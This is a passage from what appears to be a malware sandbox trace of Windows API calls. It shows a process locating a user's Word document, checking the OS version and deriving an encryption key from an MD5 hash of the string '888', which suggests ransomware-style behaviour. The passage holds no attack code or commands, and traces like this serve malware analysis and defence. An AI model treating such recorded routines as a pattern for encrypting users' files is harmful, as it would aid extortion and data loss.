Size=0x8) returned 0x2a72378 [0222.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0222.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0222.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0222.137] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/YBBoLDeAtb.docx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86845f50, ftCreationTime.dwHighDateTime=0x1d5c297, ftLastAccessTime.dwLowDateTime=0x315a7740, ftLastAccessTime.dwHighDateTime=0x1d5cc50, ftLastWriteTime.dwLowDateTime=0x315a7740, ftLastWriteTime.dwHighDateTime=0x1d5cc50, nFileSizeHigh=0x0, nFileSizeLow=0x10984, dwReserved0=0x0, dwReserved1=0x0, cFileName="YBBoLDeAtb.docx", cAlternateFileName="YBBOLD~1.DOC")) returned 0x9e1eb8 [0222.137] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0222.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0222.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0222.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0222.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0222.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0222.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0222.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0222.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0222.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0222.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0222.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0222.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0222.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0222.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0222.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0222.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0222.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0222.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0222.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0222.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0222.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0222.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0222.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0222.139] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0222.139] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0222.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0222.140] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0222.140] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0222.141] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0222.141] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0222.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0222.142] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0222.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0222.142] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0222.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0222.142] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.142] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0222.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0222.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0222.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0222.143] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c110) returned 1 [0222.144] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0222.144] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0222.146] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0222.146] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0222.146] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0222.146] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0222.147] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0222.147] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0222.147] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.147] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.147] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0222.147] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0222.147] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.147] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.147] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0222.147] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0222.147] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0222.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabab8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0222.148] CryptCreateHash (in: hProv=0xa7c110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0222.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0222.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0222.148] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0222.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0222.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0222.148] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.148] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0222.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabb90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0222.148] CryptHashData (hHash=0x9e1db8, pbData=0x2a72778, dwDataLen=0x3, dwFlags=0x1) returned 1 [0222.148] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.148] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.148] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0222.148] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0222.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0222.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabb30, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0222.148] CryptDeriveKey (in: hProv=0xa7c110, Algid=0x6601, hBaseData=0x9e1db8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1d38) returned 1 [0222.149] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.149] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.149] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0222.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0222.149] CryptDestroyHash (hHash=0x9e1db8) returned 1 [0222.149] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0222.149] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0222.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0222.150] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.150] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.150] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0222.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 